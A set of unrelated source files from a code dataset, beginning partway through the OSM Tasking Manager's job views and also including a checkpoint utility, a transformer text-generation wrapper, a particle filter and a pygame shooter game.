request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n tiles = {}\n for tile in job.tiles:\n if tile.username is not None and tile.checkout is True \\\n or tile.checkin != 0:\n tiles[str(tile.x) + '-' + str(tile.y) + '-' + str(tile.zoom)] = dict(\n checkin=tile.checkin,\n username=(tile.username if tile.checkout is True else None))\n return tiles\n\n@view_config(route_name='job_edit', renderer='job.edit.mako', permission='admin')\ndef job_edit(request):\n id = request.matchdict['job']\n session = DBSession()\n job 
= session.query(Job).get(id)\n\n licenses = session.query(License).all()\n\n if 'form.submitted' in request.params:\n job.title = request.params['title']\n job.short_description = request.params['short_description']\n job.description = request.params['description']\n job.workflow = request.params['workflow']\n josm_preset = request.params['josm_preset']\n josm_preset = josm_preset.value.decode('UTF-8') if josm_preset != '' else ''\n job.josm_preset = josm_preset\n job.is_private = request.params.get('is_private') == 'on'\n job.imagery = request.params['imagery']\n job.imagery_offset_x = parse_float(request.params['imagery_offset_x'])\n job.imagery_offset_y = parse_float(request.params['imagery_offset_y'])\n job.task_extra = request.params['task_extra']\n\n if request.params['license_id'] != \"\":\n license_id = int(request.params['license_id'])\n license = session.query(License).get(license_id)\n job.license = license\n\n session.add(job)\n return HTTPFound(location = route_url('job', request, job=job.id))\n\n return dict(job=job, licenses=licenses)\n\n@view_config(route_name='job_archive', permission='admin')\ndef job_archive(request):\n id = request.matchdict['job']\n session = DBSession()\n\n job = session.query(Job).get(id)\n job.status = 0\n session.add(job)\n\n request.session.flash('Job \"%s\" archived!' % job.title)\n return HTTPFound(location = route_url('home', request))\n\n@view_config(route_name='job_publish', permission='admin')\ndef job_publish(request):\n id = request.matchdict['job']\n session = DBSession()\n\n job = session.query(Job).get(id)\n job.status = 1\n session.add(job)\n\n request.session.flash('Job \"%s\" published!' % job.title)\n return HTTPFound(location = route_url('home', request))\n\n@view_config(route_name='job_feature', permission='admin')\ndef job_feature(request):\n id = request.matchdict['job']\n session = DBSession()\n\n job = session.query(Job).get(id)\n job.featured = not job.featured\n session.add(job)\n\n request.session.flash('Job \"%s\" featured status changed!' % job.title)\n return HTTPFound(location = route_url('home', request))\n\n@view_config(route_name='job_new', renderer='job.new.mako',\n permission='admin')\ndef job_new(request):\n if 'form.submitted' in request.params:\n session = DBSession()\n job = Job(\n request.params['title'],\n request.params['geometry'],\n request.params['zoom'],\n authenticated_userid(request)\n )\n\n session.add(job)\n session.flush()\n return HTTPFound(location = route_url('job_edit', request, job=job.id))\n return {}\n\n@view_config(route_name='job_users', renderer='job.users.mako', permission='admin')\ndef job_users(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n if 'form.submitted' in request.params:\n username = request.params['username']\n user = session.query(User).get(username)\n if user:\n job.users.append(user)\n session.flush()\n request.session.flash('User \"%s\" added to the whitelist!' % username)\n else:\n request.session.flash('User \"%s\" not found!' 
% username)\n    all_users = session.query(User).order_by('username').all()\n    return dict(job=job, all_users=all_users)\n\n@view_config(route_name='job_tags', renderer='job.tags.mako', permission='admin')\ndef job_tags(request):\n    id = request.matchdict['job']\n    session = DBSession()\n    job = session.query(Job).get(id)\n    if 'form.submitted' in request.params:\n        new_tag = request.params['tag']\n        tag = session.query(Tag).get(new_tag)\n        if tag is None:\n            tag = Tag(new_tag)\n        if tag not in job.tags:\n            job.tags.append(tag)\n\n    all_tags = session.query(Tag).order_by('tag').all()\n    return dict(job=job, all_tags=all_tags)\n\n@view_config(route_name='job_export', permission='admin')\ndef job_export(request):\n    id = request.matchdict['job']\n    session = DBSession()\n    job = session.query(Job).get(id)\n    import shapefile\n    w = shapefile.Writer(shapefile.POLYGON)\n    w.field('checkin', 'N', 1, 0)\n    for tile in job.tiles:\n        polygon = tile.to_polygon(4326)\n        coords = polygon.exterior.coords\n        parts = [[[x, y] for (x, y) in coords]]\n        w.poly(parts=parts)\n        w.record(tile.checkin)\n    # FIXME we should use a temp directory instead of hardcoded /tmp paths\n    w.save('/tmp/tiles')\n    import zipfile\n    myzip = zipfile.ZipFile('/tmp/tiles.zip', 'w', zipfile.ZIP_DEFLATED)\n    myzip.write('/tmp/tiles.shp', job.title + '/tiles.shp')\n    myzip.write('/tmp/tiles.dbf', job.title + '/tiles.dbf')\n    myzip.write('/tmp/tiles.shx', job.title + '/tiles.shx')\n    myzip.close()\n    content_disposition = 'attachment; filename=export.zip'\n    return request.get_response(FileApp('/tmp/tiles.zip', **{\"Content-Disposition\":content_disposition}))\n\n@view_config(route_name='job_preset')\ndef job_preset(request):\n    id = request.matchdict['job']\n    session = DBSession()\n    job = session.query(Job).get(id)\n    response = Response()\n    response.text = job.josm_preset\n    response.content_disposition = 'attachment; filename=hotosm_tasking_manager_job_%s.xml' % job.id\n    response.content_type = 'application/x-josm-preset'\n    return response\n\n\ndef get_stats(job):\n    \"\"\"Get the tiles that changed and build per-day stats (date, checkin) for a chart.\"\"\"\n    session = DBSession()\n\n    filter = and_(\n        TileHistory.change == True, TileHistory.job_id == job.id,\n        # must be != None so SQLAlchemy emits an IS NOT NULL clause;\n        # a Python \"is not None\" test here would evaluate to a constant\n        TileHistory.username != None, TileHistory.version > 0\n    )\n    tiles = (\n        session.query(\n            TileHistory.update, TileHistory.checkin, TileHistory.x,\n            TileHistory.y, TileHistory.zoom\n        )\n        .filter(filter)\n        .order_by(TileHistory.update)\n        .all()\n    )\n\n    log.debug('Number of tiles: %s', len(tiles))\n    stats = []\n    done = 0\n    tile_changes = []\n\n    # group by days\n    days_with_changes = itertools.groupby(tiles, key=lambda t: t[0].date())\n    # for every day count number of changes and aggregate changed tiles\n    for day in days_with_changes:\n        for change in day[1]:\n            if change.checkin == 1:\n                done += 1\n            if change.checkin == 0:\n                done -= 1\n            tile_changes.append([change.x, change.y, change.zoom])\n\n        # append a day to the stats and add total number of 'done' tiles and a\n        # copy of a current tile_changes list\n        stats.append([day[0].isoformat(), done, tile_changes[:]])\n\n    return stats\n\n\n
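# Illustrative shape of the value get_stats() returns (hypothetical numbers): a list of\n# [iso_date, running_done_count, changed_tiles] entries, e.g.\n#   [['2013-05-01', 2, [[12, 34, 12], [13, 34, 12]]]]\n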
def get_users(job):\n    \"\"\"Get the tiles that changed (date, checkin) and build the per-user list.\"\"\"\n    session = DBSession()\n    # filter on tiles with changes, for this job, that have a username and have\n    # checkin status == 1 (validation)\n    filter = and_(\n        TileHistory.change == True, TileHistory.job_id == job.id,\n        TileHistory.username != None, TileHistory.checkin == 1,\n        TileHistory.version > 0\n    )\n    # get the users, and order by username (IMPORTANT for group_by later)\n    working_users = (\n        session.query(\n            TileHistory.username, TileHistory.x, TileHistory.y,\n            TileHistory.zoom\n        )\n        .filter(filter)\n        .order_by(TileHistory.username)\n        .all()\n    )\n\n    # create a dictionary of users, grouped by username (aggregate tiles)\n    # groupby will produce a key: grouper_object dictionary, so we use a list\n    # comprehension to evaluate and expand every grouper_object\n    users_grouped = {\n        user[0]: [\n            tile[1:] for tile in user[1]\n        ]\n        for user in itertools.groupby(working_users, key=lambda user: user[0])\n    }\n\n    log.debug('Users worked on job %s: %s', job.id, len(users_grouped))\n\n    return users_grouped\n","repo_name":"hotosm/osm-tasking-manager","sub_path":"OSMTM/views/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":11910,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"77"}
{"seq_id":"69991534010","text":"import mgrapi\n\nclass InitialState(mgrapi.TimeInterval, mgrapi.TupleName):\n    def __init__(self, name):\n        self.name = name\n        t = mgrapi.MinusInfinity()\n        super(InitialState, self).__init__(t, t)\n\nclass StatelessActor(mgrapi.ActorNode):\n    def __init__(self, name):\n        super(StatelessActor, self).__init__(name)\n        self.checkpoints.add(InitialState(name + ('ckpt',)))\n    def rollback(self, cp):\n        assert(isinstance(cp, InitialState))\n\nclass BufferCheckpoint(mgrapi.TimeInterval, mgrapi.TupleName):\n    def __init__(self, name, t, data):\n        self.name = name\n        self.data = data\n        super(BufferCheckpoint, self).__init__(t, t)\n\nclass BufferNode(mgrapi.DataNode):\n    def __init__(self, name, t, origdata):\n        \"\"\"origdata is an instance of record\"\"\"\n        super(BufferNode, self).__init__(name)\n        self.origdata = origdata\n        self.data = origdata\n        self.checkpoints.add(BufferCheckpoint(name + ('ckpt0',),\n                                              mgrapi.MinusInfinity(),\n                                              None))\n        self.checkpoints.add(BufferCheckpoint(name + ('ckpt1',),\n                                              t, origdata))\n    def rollback(self, cp):\n        assert(isinstance(cp, BufferCheckpoint))\n        self.data = cp.data\n","repo_name":"haowu4682/repair","sub_path":"code/retro/repair/mgrutil.py","file_name":"mgrutil.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"29209708719","text":"import logging\n\nimport numpy as np\nimport torch\n\nfrom transformers import (\n    CTRLLMHeadModel,\n    CTRLTokenizer,\n    GPT2LMHeadModel,\n    GPT2Tokenizer,\n    OpenAIGPTLMHeadModel,\n    OpenAIGPTTokenizer,\n    TransfoXLLMHeadModel,\n    TransfoXLTokenizer,\n    XLMTokenizer,\n    XLMWithLMHeadModel,\n    XLNetLMHeadModel,\n    XLNetTokenizer,\n)\n\n\nlogging.basicConfig(\n    format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\", datefmt=\"%m/%d/%Y %H:%M:%S\", level=logging.INFO,\n)\nlogger = logging.getLogger(__name__)\nlogging.disable(logging.INFO)\n\nMAX_LENGTH = int(10000)  # Hardcoded max length to avoid infinite loop\n\nMODEL_CLASSES = {\n    \"gpt2\": (GPT2LMHeadModel, GPT2Tokenizer),\n    \"ctrl\": (CTRLLMHeadModel, CTRLTokenizer),\n    \"openai-gpt\": (OpenAIGPTLMHeadModel, OpenAIGPTTokenizer),\n    \"xlnet\": (XLNetLMHeadModel, XLNetTokenizer),\n    \"transfo-xl\": (TransfoXLLMHeadModel, TransfoXLTokenizer),\n    \"xlm\": (XLMWithLMHeadModel, XLMTokenizer),\n}\n\n# Padding text to help Transformer-XL and XLNet with short prompts as proposed by Aman Rusia\n# in https://github.com/rusiaaman/XLNet-gen#methodology\n# and 
https://medium.com/@amanrusia/xlnet-speaks-comparison-to-gpt-2-ea1a4e9ba39e\nPADDING_TEXT = \"\"\" In 1991, the remains of Russian Tsar Nicholas II and his family\n(except for Alexei and Maria) are discovered.\nThe voice of Nicholas's young son, Tsarevich Alexei Nikolaevich, narrates the\nremainder of the story. 1883 Western Siberia,\na young Grigori Rasputin is asked by his father and a group of men to perform magic.\nRasputin has a vision and denounces one of the men as a horse thief. Although his\nfather initially slaps him for making such an accusation, Rasputin watches as the\nman is chased outside and beaten. Twenty years later, Rasputin sees a vision of\nthe Virgin Mary, prompting him to become a priest. Rasputin quickly becomes famous,\nwith people, even a bishop, begging for his blessing. \"\"\"\n\n\ndef set_seed(seed, n_gpu):\n np.random.seed(seed)\n torch.manual_seed(seed)\n if n_gpu > 0:\n torch.cuda.manual_seed_all(seed)\n\n\ndef prepare_ctrl_input(args, _, tokenizer, prompt_text):\n if args.temperature > 0.7:\n logger.info(\"CTRL typically works better with lower temperatures (and lower top_k).\")\n\n encoded_prompt = tokenizer.encode(prompt_text, add_special_tokens=False)\n if not any(encoded_prompt[0] == x for x in tokenizer.control_codes.values()):\n logger.info(\"WARNING! You are not starting your generation from a control code so you won't get good results\")\n return prompt_text\n\n\ndef prepare_xlm_input(args, model, tokenizer, prompt_text):\n # kwargs = {\"language\": None, \"mask_token_id\": None}\n\n # Set the language\n use_lang_emb = hasattr(model.config, \"use_lang_emb\") and model.config.use_lang_emb\n if hasattr(model.config, \"lang2id\") and use_lang_emb:\n available_languages = model.config.lang2id.keys()\n if args.xlm_language in available_languages:\n language = args.xlm_language\n else:\n language = None\n while language not in available_languages:\n language = input(\"Using XLM. 
Select language in \" + str(list(available_languages)) + \" >>> \")\n # kwargs[\"language\"] = tokenizer.lang2id[language]\n\n # TODO fix mask_token_id setup when configurations will be synchronized between models and tokenizers\n # XLM masked-language modeling (MLM) models need masked token\n # is_xlm_mlm = \"mlm\" in args.model_name_or_path\n # if is_xlm_mlm:\n # kwargs[\"mask_token_id\"] = tokenizer.mask_token_id\n\n return prompt_text\n\n\ndef prepare_xlnet_input(args, _, tokenizer, prompt_text):\n prompt_text = (args.padding_text if args.padding_text else PADDING_TEXT) + prompt_text\n return prompt_text, {}\n\n\ndef prepare_transfoxl_input(args, _, tokenizer, prompt_text):\n prompt_text = (args.padding_text if args.padding_text else PADDING_TEXT) + prompt_text\n return prompt_text, {}\n\n\nPREPROCESSING_FUNCTIONS = {\n \"ctrl\": prepare_ctrl_input,\n \"xlm\": prepare_xlm_input,\n \"xlnet\": prepare_xlnet_input,\n \"transfo-xl\": prepare_transfoxl_input,\n}\n\n\ndef adjust_length_to_model(length, max_sequence_length):\n if length < 0 and max_sequence_length > 0:\n length = max_sequence_length\n elif 0 < max_sequence_length < length:\n length = max_sequence_length # No generation bigger than model size\n elif length < 0:\n length = MAX_LENGTH # avoid infinite loop\n return length\n\n\nclass TextGenerator:\n def __init__(\n self,\n model_type: str,\n model_name_or_path: str,\n padding_text: str = \"\",\n xlm_language: str = \"\",\n seed: int = 42,\n no_cuda: bool = False\n ):\n self.model_type = model_type.lower()\n self.model_name_or_path = model_name_or_path\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() and not no_cuda else \"cpu\")\n self.n_gpu = torch.cuda.device_count()\n\n set_seed(seed, self.n_gpu)\n \n # Initialize the model and tokenizer\n try:\n self.model_class, self.tokenizer_class = MODEL_CLASSES[self.model_type]\n except KeyError:\n raise KeyError(\"the model {} you specified is not supported. You are welcome to add it and open a PR :)\")\n\n self.tokenizer = self.tokenizer_class.from_pretrained(self.model_name_or_path)\n self.model = self.model_class.from_pretrained(self.model_name_or_path)\n self.model.to(self.device)\n\n def generate(\n self,\n prompt: str = \"\",\n length: int = 20,\n stop_token: str = \"\",\n temperature: float = 1.0,\n repetition_penalty: float = 1.0,\n k: int = 0,\n p: float = 0.9,\n ):\n length = adjust_length_to_model(\n length,\n max_sequence_length=self.model.config.max_position_embeddings\n )\n\n # Different models need different input formatting and/or extra arguments\n requires_preprocessing = self.model_type in PREPROCESSING_FUNCTIONS.keys()\n # if requires_preprocessing:\n # prepare_input = PREPROCESSING_FUNCTIONS.get(self.model_type)\n # prompt = prepare_input(args, self.model, self.tokenizer, prompt)\n encoded_prompt = self.tokenizer.encode(prompt, add_special_tokens=False, return_tensors=\"pt\")\n encoded_prompt = encoded_prompt.to(self.device)\n\n output_sequences = self.model.generate(\n input_ids=encoded_prompt,\n max_length=length,\n temperature=temperature,\n top_k=k,\n top_p=p,\n repetition_penalty=repetition_penalty,\n )\n\n # Batch size == 1. 
to add more examples please use num_return_sequences > 1\n generated_sequence = output_sequences[0].tolist()\n text = self.tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)\n text = text[: text.find(stop_token) if stop_token else None]\n\n return text\n","repo_name":"kabirkhan/synth","sub_path":"synth/generation.py","file_name":"generation.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21043517002","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nfrom math import atan2\nfrom numpy.linalg import norm\nfrom numpy.random import randn\nfrom numpy.random import random, uniform\nimport scipy.stats\n\n\nclass PF:\n def __init__(self, N, landmarks, measure_std_error, control_std_error, state_vector_size):\n self.mean = 0\n self.std = 0\n self.N = N\n self.dt = 0.1\n self.state_vector = np.zeros(state_vector_size)\n self.weights = np.zeros(self.N)\n #self.weights.fill(1./self.N)\n self.particles = np.empty((self.N, 3))\n self.landmarks = landmarks\n #self.R = [measure_std_error, control_std_error]\n self.R = measure_std_error\n # range error\n self.Q = np.diag([0.1])**2\n # input error\n #self.R = np.diag([1.0, np.deg2rad(40.0)])**2 \n \n\n def create_gaussian_particles(self, mean, std):\n self.particles = np.empty((self.N, 3))\n self.particles[:, 0] = mean[0] + (randn(self.N) * std[0])\n self.particles[:, 1] = mean[1] + (randn(self.N) * std[1])\n self.particles[:, 2] = mean[2] + (randn(self.N) * std[2])\n self.particles[:, 2] %= 2 * np.pi\n\n def create_uniform_particles(self, x_range, y_range, hdg_range, N):\n self.particles = np.empty((self.N, 3))\n self.particles[:, 0] = uniform(x_range[0], x_range[1], size=N)\n self.particles[:, 1] = uniform(y_range[0], y_range[1], size=N)\n self.particles[:, 2] = uniform(hdg_range[0], hdg_range[1], size=N)\n self.particles[:, 2] %= 2 * np.pi\n \n \n\n def neff(self, weights):\n return 1. / np.sum(np.square(weights))\n \n def predict(self, u, std, dt=1.):\n #N = len(self.particles)\n self.state_vector[0] += (-u[0]/u[1])*np.sin(self.state_vector[2])+(u[0]/u[1])*np.sin(self.state_vector[2]+u[1]*dt)\n self.state_vector[1] += (u[0]/u[1])*np.cos(self.state_vector[2])-(u[0]/u[1])*np.cos(self.state_vector[2]+u[1]*dt)\n self.state_vector[2] += u[1]*dt\n\n self.particles[:,0] += (-u[0]/u[1])*np.sin(self.particles[:,2])+(u[0]/u[1])*np.sin(self.particles[:,2]+u[1]*dt)\n self.particles[:,1] += (u[0]/u[1])*np.cos(self.particles[:,2])-(u[0]/u[1])*np.cos(self.particles[:,2]+u[1]*dt)\n self.particles[:,2] += u[1]*dt\n \n def update(self, z, markers):\n self.weights.fill(1.)\n for i, landmark in enumerate(markers):\n distance = np.linalg.norm(self.particles[:, 0:2] - landmark, axis=1)\n self.weights *= scipy.stats.norm(distance, self.R).pdf(z[i])\n\n self.weights += 1.e-300\n self.weights /= sum(self.weights)\n \n\n\n def resample(self):\n \n cumulative_sum = np.cumsum(self.weights)\n cumulative_sum[-1] = 1. 
# avoid round-off error\r\n        indexes = np.searchsorted(cumulative_sum, random(self.N))\r\n\r\n        # resample according to indexes\r\n        self.particles = self.particles[indexes]\r\n        self.weights = self.weights[indexes]\r\n        self.weights /= np.sum(self.weights) # normalize\r\n\r\n    def estimate(self):\r\n        \"\"\" returns mean and variance \"\"\"\r\n        \r\n        pos = self.particles[:, 0:3]\r\n        mu = np.average(pos, weights=self.weights, axis=0)\r\n        var = np.average((pos - mu)**2, weights=self.weights, axis=0)\r\n        self.state_vector = mu\r\n        return mu, var","repo_name":"ZY-KK/tuni_robot_motion","sub_path":"src/moro_ros/filtering_utils/src/filtering_utils/pf.py","file_name":"pf.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"25814414874","text":"import pygame\r\nimport random\r\nimport os\r\nimport json\r\n\r\nFPS = 60 # number of game updates per second\r\nWIDTH = 500\r\nHEIGHT = 700\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\n\r\nclock = pygame.time.Clock() # manages game timing\r\n# initialize pygame & create the window\r\npygame.init()\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT)) # set the window size\r\npygame.display.set_caption(\"JetGame\") # window title\r\n\r\n# load background images\r\nbackground_img = pygame.image.load(os.path.join(\"image\", \"background.png\")).convert() # convert() to a format pygame reads efficiently\r\nbackground02_img = pygame.image.load(os.path.join(\"image\", \"background.png\")).convert()\r\nbackground_size = background_img.get_size()\r\nbackground_rect = background_img.get_rect()\r\nx0, y0 = 0, 0 # initial position of background 1\r\nx1, y1 = 0, -700 # initial position of background 2\r\n\r\n# load sprite images\r\nrock_img = pygame.image.load(os.path.join(\"image\", \"rock.png\")).convert()\r\nbullet_img = pygame.image.load(os.path.join(\"image\", \"bullet.png\")).convert()\r\nbullet02_img = pygame.image.load(os.path.join(\"image\", \"bullet02.png\")).convert()\r\nplane01_img = pygame.image.load(os.path.join(\"image\", \"plane01(1).png\")).convert()\r\nplane01R_img = pygame.image.load(os.path.join(\"image\", \"plane01_R30.png\")).convert()\r\nplane01L_img = pygame.image.load(os.path.join(\"image\", \"plane01_L30.png\")).convert()\r\nenmies_img = pygame.image.load(os.path.join(\"image\", \"plane03.png\")).convert()\r\n\r\n# load the font\r\nfont_name = pygame.font.match_font('arial')\r\n\r\n# draw the score\r\ndef write_text(surf, text, size, x, y):\r\n    font = pygame.font.Font(font_name, size)\r\n    text_surface = font.render(text, True, WHITE) # True enables anti-aliasing\r\n    text_rect = text_surface.get_rect()\r\n    text_rect.centerx = x\r\n    text_rect.top = y\r\n    surf.blit(text_surface, text_rect) # draw the text\r\n\r\n# draw the life count\r\ndef draw_lifes(surf, text, size, x, y):\r\n    font = pygame.font.Font(font_name, size)\r\n    text_surface = font.render(text, True, RED) # True enables anti-aliasing\r\n    text_rect = text_surface.get_rect()\r\n    text_rect.centerx = x\r\n    text_rect.top = y\r\n    surf.blit(text_surface, text_rect) # draw the text\r\n\r\n#def newRock():\r\n#    rock = Rock()\r\n#    all_sprites.add(rock) # after deleting a rock, create a new one and add it back to the groups\r\n#    rocks.add(rock) \r\n\r\ndef newEnmies():\r\n    enmy = Enmies()\r\n    all_sprites.add(enmy)\r\n    enmies.add(enmy) \r\n\r\n# player\r\nclass Player(pygame.sprite.Sprite):\r\n    def __init__(self):\r\n        pygame.sprite.Sprite.__init__(self) # call the parent initializer\r\n        #self.image = pygame.Surface((70, 120)) # displayed image\r\n        #self.image.fill((100, 100, 100)) \r\n        self.direction = 0\r\n        self.image = pygame.transform.scale(plane01_img, (120, 100)) # resize the image\r\n        self.image.set_colorkey(BLACK) # colorkey transparency\r\n        self.rect = self.image.get_rect() # position the image (bounding rect)\r\n        self.radius = 35 # radius of the circular collision area\r\n        
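# (Added note) pygame.sprite.collide_circle reads this .radius attribute when\r\n        # present; a rough sketch of the test it performs for two sprites a and b:\r\n        #   dx = a.rect.centerx - b.rect.centerx\r\n        #   dy = a.rect.centery - b.rect.centery\r\n        #   hit = dx * dx + dy * dy <= (a.radius + b.radius) ** 2\r\n        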
pygame.draw.circle(self.image, WHITE, self.rect.center, self.radius) # draw the collision circle\r\n        self.rect.centerx = WIDTH / 2\r\n        self.rect.bottom = HEIGHT - 50\r\n        self.speedx = 7 # movement speed\r\n        self.lifes = 5\r\n\r\n    def animate(self):\r\n        if self.direction == -1: # facing left\r\n            self.image = pygame.transform.scale(plane01L_img, (120, 100))\r\n            self.image.set_colorkey(BLACK)\r\n            #self.rect = self.image.get_rect()\r\n        elif self.direction == 1: # facing right\r\n            self.image = pygame.transform.scale(plane01R_img, (120, 100))\r\n            self.image.set_colorkey(BLACK)\r\n            #self.rect = self.image.get_rect()\r\n        else:\r\n            self.image = pygame.transform.scale(plane01_img, (120, 100))\r\n            self.image.set_colorkey(BLACK)\r\n            #self.rect = self.image.get_rect()\r\n\r\n    def update(self):\r\n        # move the ship with WASD\r\n        self.image = pygame.transform.scale(plane01_img, (120, 100))\r\n        self.direction = 0\r\n\r\n        key_pressed = pygame.key.get_pressed() # check which keys are held down\r\n        if key_pressed[pygame.K_d]: # d moves the ship right\r\n            self.direction = 1\r\n            self.rect.x += self.speedx\r\n            if self.rect.centerx > WIDTH: # stop at the right edge\r\n                self.rect.centerx = WIDTH\r\n\r\n        if key_pressed[pygame.K_a]: \r\n            self.direction = -1\r\n            self.rect.x -= self.speedx\r\n            if self.rect.centerx < 0:\r\n                self.rect.centerx = 0\r\n\r\n        if key_pressed[pygame.K_w]: \r\n            self.rect.y -= self.speedx\r\n            if self.rect.top < 0:\r\n                self.rect.top = 0\r\n\r\n        if key_pressed[pygame.K_s]: \r\n            self.rect.y += self.speedx\r\n            if self.rect.bottom - 10 > HEIGHT:\r\n                self.rect.bottom = HEIGHT + 10\r\n    \r\n    # fire a bullet\r\n    def shoot(self):\r\n        bullet = Bullet(self.rect.centerx, self.rect.top + 30)\r\n        all_sprites.add(bullet) \r\n        bullets.add(bullet) \r\n\r\nclass Rock(pygame.sprite.Sprite):\r\n    def __init__(self):\r\n        pygame.sprite.Sprite.__init__(self) # call the parent initializer\r\n        #self.image = pygame.Surface((30, 30)) # displayed image\r\n        #self.image.fill((0, 0, 0)) \r\n        self.image = pygame.transform.scale(rock_img, (40, 40)) # resize the image\r\n        self.image.set_colorkey(BLACK) # colorkey transparency\r\n        self.rect = self.image.get_rect() # position the image (bounding rect)\r\n        self.radius = 15 # radius of the circular collision area\r\n        #pygame.draw.circle(self.image, WHITE, self.rect.center, self.radius) # draw the collision circle\r\n        self.rect.x = random.randrange(0, WIDTH - self.rect.width) # random initial x (inside the window)\r\n        self.rect.y = random.randrange(-150, -100) # random initial y (above the window)\r\n        self.speedy = random.randrange(3, 7) # movement speed\r\n        self.speedx = random.randrange(-3, 3)\r\n\r\n    def update(self):\r\n        # move the rock\r\n        self.rect.y += self.speedy\r\n        self.rect.x += self.speedx\r\n\r\n        # when the rock leaves the window, reset it to a start position\r\n        if self.rect.top > HEIGHT or self.rect.left > WIDTH or self.rect.right < 0:\r\n            self.rect.x = random.randrange(0, WIDTH - self.rect.width)\r\n            self.rect.y = random.randrange(-150, -40)\r\n            self.speedy = random.randrange(2, 10)\r\n            self.speedx = random.randrange(-3, 3)\r\n\r\n
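# (Added sketch) Rock and Enmies below share the same \"respawn when off-screen\"\r\n# logic; a hypothetical shared helper could look like:\r\n#   def respawn(sprite, y_range=(-150, -40)):\r\n#       sprite.rect.x = random.randrange(0, WIDTH - sprite.rect.width)\r\n#       sprite.rect.y = random.randrange(*y_range)\r\n#       sprite.speedx = random.randrange(-3, 3)\r\n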
class Enmies(pygame.sprite.Sprite):\r\n    def __init__(self):\r\n        pygame.sprite.Sprite.__init__(self) # call the parent initializer\r\n        #self.image = pygame.Surface((30, 30)) # displayed image\r\n        #self.image.fill((0, 0, 0)) \r\n        self.image = pygame.transform.scale(enmies_img, (80, 60)) # resize the image\r\n        self.image.set_colorkey(WHITE) # colorkey transparency\r\n        self.rect = self.image.get_rect() # position the image (bounding rect)\r\n        self.radius = 18 # radius of the circular collision area\r\n        #pygame.draw.circle(self.image, RED, self.rect.center, self.radius) # draw the collision circle\r\n        self.rect.x = random.randrange(0, WIDTH - self.rect.width) # random initial x (inside the window)\r\n        #self.rect.y = random.randrange(-150, -100) # random initial y (above the window)\r\n        self.rect.y = 70\r\n        self.speedy = random.randrange(3, 7) # movement speed\r\n        self.speedx = random.randrange(-3, 3)\r\n\r\n    def update(self):\r\n        # move\r\n        #self.rect.y += self.speedy\r\n        self.rect.x += self.speedx\r\n\r\n        # when off-screen, reset to a start position\r\n        if self.rect.top > HEIGHT or self.rect.left > WIDTH or self.rect.right < 0:\r\n            self.rect.x = random.randrange(0, WIDTH - self.rect.width)\r\n            #self.rect.y = random.randrange(-150, -40)\r\n            #self.speedy = random.randrange(2, 10)\r\n            self.rect.y = 70\r\n            self.speedx = random.randrange(-3, 3)\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n    def __init__(self, x, y):\r\n        pygame.sprite.Sprite.__init__(self) # call the parent initializer\r\n        #self.image = pygame.Surface((10, 30)) # displayed image\r\n        #self.image.fill((200, 200, 0)) \r\n        self.image = pygame.transform.scale(bullet_img, (30, 40)) # resize the image\r\n        self.image.set_colorkey(BLACK) # colorkey transparency\r\n        self.rect = self.image.get_rect() # position the image (bounding rect)\r\n        self.rect.centerx = x\r\n        self.rect.bottom = y\r\n        self.speedy = 10\r\n    \r\n    def update(self):\r\n        self.rect.y -= self.speedy\r\n        if self.rect.bottom < 0:\r\n            self.kill() # remove the object from every group\r\n\r\n# sprite groups hold sprite objects\r\nall_sprites = pygame.sprite.Group()\r\n#rocks = pygame.sprite.Group()\r\nenmies = pygame.sprite.Group()\r\nbullets = pygame.sprite.Group()\r\nplayer = Player()\r\nplayer_group = pygame.sprite.Group()\r\nplayer_group.add(player)\r\nall_sprites.add(player) # put the object into the group\r\n#for i in range(7): # spawn several rocks\r\n#    newRock()\r\n\r\nfor i in range(7):\r\n    newEnmies()\r\n\r\nscore = 0 # score\r\n#lifes = 5 # life count\r\n\r\n# game loop\r\nrunning = True\r\n\r\nwhile running:\r\n    clock.tick(FPS) # cap the number of iterations per second\r\n\r\n    # read input\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT: # window closed\r\n            running = False\r\n\r\n        elif event.type == pygame.KEYDOWN: # a key was pressed\r\n            if event.key == pygame.K_SPACE:\r\n                player.shoot()\r\n\r\n    # update the game\r\n    all_sprites.update() # update every object in the groups\r\n    player.animate() # player movement animation\r\n    hits = pygame.sprite.groupcollide(enmies, bullets, True, True) # detect collisions; True/True deletes both sprites\r\n    for hit in hits: \r\n        score += 30\r\n        #newRock()\r\n        #newEnmies()\r\n        if score == 210: running = False\r\n    \r\n    hits = pygame.sprite.spritecollide(player, enmies, True, pygame.sprite.collide_circle) # circle-based player/enemy collision\r\n    for hit in hits: # lose a life per hit\r\n        player.lifes -= 1\r\n        if player.lifes <= 0: running = False\r\n        #newRock()\r\n        newEnmies()\r\n\r\n    y1 += 5 # scroll the background\r\n    y0 += 5 # scroll the background\r\n    screen.blit(pygame.transform.scale(background_img, (500, 700)), (x0, y0))\r\n    screen.blit(pygame.transform.scale(background_img, (500, 700)), (x1, y1))\r\n    if y0 > 700: y0 = -700 # once off the bottom, wrap the image back above the top\r\n    if y1 > 700: y1 = -700\r\n\r\n    all_sprites.draw(screen) # draw everything in all_sprites onto screen\r\n    write_text(screen, \"score: \" + str(score), 22, 70, 30)\r\n    draw_lifes(screen, \"lifes: \" + str(player.lifes), 22, 70, 650)\r\n\r\n    pygame.display.flip()\r\n    pygame.display.update()\r\n    